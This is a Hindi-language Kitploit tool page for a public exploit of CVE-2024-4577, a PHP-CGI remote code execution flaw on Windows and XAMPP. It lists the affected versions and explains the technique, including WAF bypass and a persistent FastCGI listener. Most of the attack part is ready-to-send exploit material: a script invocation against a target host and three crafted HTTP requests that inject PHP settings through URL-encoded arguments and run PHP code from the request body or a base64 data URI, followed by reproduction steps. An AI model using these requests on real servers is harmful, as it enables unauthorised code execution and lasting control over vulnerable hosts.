Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-4577-PHP-RCE — [भेद्यता पुनरुत्पादन] PHP डिफ़ॉल्ट वातावरण (XAMPP) का उपयोग करने वाला दुनिया का पहला CVE-2024-4577 PHP-CGI RCE भेद्यता का EXP। | Kitploit
उपकरण/GitHubGitHub/xcanwin/cve-2024-4577-php-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणWAF बाईपासपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubxcanwin/cve-2024-4577-php-rce

CVE-2024-4577-PHP-RCE

[भेद्यता पुनरुत्पादन] PHP डिफ़ॉल्ट वातावरण (XAMPP) का उपयोग करने वाला दुनिया का पहला CVE-2024-4577 PHP-CGI RCE भेद्यता का EXP।

रिपॉजिटरी देखें
1623342 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-4577-PHP-RCE

परियोजना परिचय और सिद्धांत

  • दुनिया का पहला PHP डिफ़ॉल्ट वातावरण (XAMPP) का उपयोग करने वाला CVE-2024-4577 PHP-CGI RCE शोषण (EXP).
  • दुनिया का पहला CVE-2024-4577 PHP-CGI RCE शोषण जो डिफ़ॉल्ट PHP वातावरण का उपयोग करता है. मूल शोषण साझा करना, SSRF का समर्थन करता है, WAF बाईपास का समर्थन करता है.
  • PHP डिफ़ॉल्ट वातावरण में RCE प्राप्त करें. सिद्धांत: cgi.force_redirect + REDIRECT-STATUS.
  • नया मूल EXP जोड़ा गया, WAF बाईपास परिदृश्य के लिए समर्थन. सिद्धांत: FastCGI सर्वर स्थापित करना + FastCGI प्रोटोकॉल संचार.
  • नया मूल EXP जोड़ा गया, SSRF परिदृश्य के लिए समर्थन. सिद्धांत: data:// प्रोटोकॉल + GET अनुरोध.

EXP 1 के लाभ

  • allow_url_include, auto_prepend_file, auto_append_file की आवश्यकता के बिना RCE. कोई भी फ़ाइल और php फ़ाइल शामिल कर सकते हैं.
  • WAF द्वारा अक्सर ब्लॉक किए जाने वाले कीवर्ड allow_url_include, , दिखाई नहीं देंगे.
auto_prepend_file
auto_append_file
  • FastCGI सर्वर का सारा संचार WAF द्वारा लॉग नहीं किया जाएगा.
  • नए पोर्ट पर सुनना, इस प्रकार apache और php से स्वतंत्र, php सर्वर का स्थायी नियंत्रण प्राप्त करना.
  • भेद्यता परिचय

    जानकारीसामग्री
    भेद्यता नामPHP RCE
    भेद्यता संख्याCVE-2024-4577
    जोखिम स्तरउच्च जोखिम
    भेद्यता प्रकारRCE
    शोषण कठिनाईकम

    प्रभावित संस्करण

    • PHP Windows संस्करण 8.3.0 <= प्रभावित संस्करण < 8.3.8
    • PHP Windows संस्करण 8.2.0 <= प्रभावित संस्करण < 8.2.20
    • PHP Windows संस्करण 8.1.0 <= प्रभावित संस्करण < 8.1.29
    • PHP Windows संस्करण प्रभावित संस्करण == 8.0.x
    • PHP Windows संस्करण प्रभावित संस्करण == 7.x
    • PHP Windows संस्करण प्रभावित संस्करण == 5.x
    • XAMPP Windows संस्करण 8.2.0 <= प्रभावित संस्करण <= 8.2.12
    • XAMPP Windows संस्करण 8.1.0 <= प्रभावित संस्करण <= 8.1.25
    • XAMPP Windows संस्करण प्रभावित संस्करण == 8.0.x
    • XAMPP Windows संस्करण प्रभावित संस्करण == 7.x
    • XAMPP Windows संस्करण प्रभावित संस्करण == 5.x

    EXP 1

    WAF बाईपास परिदृश्य + डिफ़ॉल्ट परिदृश्य के लिए उपयोग करें:

    root@kitploit:~
    python CVE-2024-4577-PHP-RCE.py PhpServerHost:PhpServerPort
    

    उदाहरण:

    root@kitploit:~
    python CVE-2024-4577-PHP-RCE.py 123.123.123.123:80
    

    EXP 2

    SSRF परिदृश्य + डिफ़ॉल्ट परिदृश्य के लिए उपयोग करें:

    root@kitploit:~
    http://PhpServerHost:PhpServerPort/php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+-d+allow_url_include%3d1+-d+auto_prepend_file%3d"data:XCANWIN/XCANWIN;base64,PD9waHAgZGllKCJUZSIuInNUIik7Pz4g"
    

    EXP 3

    डिफ़ॉल्ट परिदृश्य के लिए उपयोग करें:

    root@kitploit:~
    POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3dXCANWIN+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
    Host: PhpServerHost
    
    <?php die("Te"."sT");?>
    

    EXP 4

    डिफ़ॉल्ट परिदृश्य के लिए उपयोग करें:

    root@kitploit:~
    POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1
    Host: PhpServerHost
    REDIRECT-STATUS: XCANWIN
    
    <?php die("Te"."sT");?>
    

    पुनरुत्पादन

    1. सर्वर वातावरण:
    root@kitploit:~
    XAMPP Windows संस्करण 8.2.12
    
    1. सर्वर डाउनलोड करें और XAMPP स्थापित करें:
    root@kitploit:~
    https://zenlayer.dl.sourceforge.net/project/xampp/XAMPP%20Windows/8.2.12/xampp-windows-x64-8.2.12-0-VS16-installer.exe?viasf=1
    
    या आप स्वयं यहां प्रभावित संस्करण चुन सकते हैं: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/
    
    1. सर्वर कॉन्फ़िगरेशन
    root@kitploit:~
    कोई संशोधन आवश्यक नहीं, डिफ़ॉल्ट कॉन्फ़िगरेशन रखें
    
    1. क्लाइंट द्वारा EXP का उपयोग
    root@kitploit:~
    उपरोक्त EXP का उपयोग करके परीक्षण करें
    
    1. सत्यापन
    root@kitploit:~
    जांचें कि क्या स्ट्रिंग "TesT" या सर्वर की system.ini फ़ाइल सामग्री वापस आती है
    
    टूल डाउनलोड करें